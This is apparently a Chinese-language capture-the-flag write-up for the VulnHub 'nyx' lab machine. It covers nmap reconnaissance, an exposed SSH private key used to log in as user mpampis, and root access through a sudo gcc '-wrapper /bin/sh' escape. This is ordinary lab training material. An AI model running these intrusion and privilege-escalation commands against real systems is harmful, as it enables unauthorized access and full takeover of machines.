vulnhub nyx
今天分享一个简单的靶机 nyx,下载地址:点我下载
信息收集
攻击机IP:192.168.87.130
可以看到靶机ip为:192.168.87.128
探测服务以及端口
nmap -sV 192.168.87.128
nmap -p- 192.168.87.128
访问 80端口:
看一下源码文件:
提示说不要把时间浪费在 /robots.txt 等文件上,先看看再说。
看来真的不存在。尝试一下nikto。
没有什么很有价值的东西。扫目录也没有什么有用的东西。
用御剑扫了一下目录(自己整合的字典):
发现了key.php
不过多次尝试觉得不存在sql注入等,应该是需要获得第一个flag才可以。
找了一下文章,发现了nmap的高级用法:
nmap -p 80 --script=http-enum 192.168.87.128
访问一下页面:
看着像是 mpampis用户的ssh密钥 保存一下 ,尝试免密ssh登录
chmod 600 id_rsa
ssh -i id_rsa mpampis@192.168.87.128
查看当前用户可暂时切换能执行的命令:
sudo -l
可以看到当前用户可以通过gcc暂时切换到root。
sudo gcc -wrapper /bin/sh,-s .
成功提权。
获取flag。
ls
cat user.txt
cd /root
ls
结尾
root.txt文件里没有内容。为了确认一下,会不会还有root.txt文件,查了一下。
只有一个root.txt文件。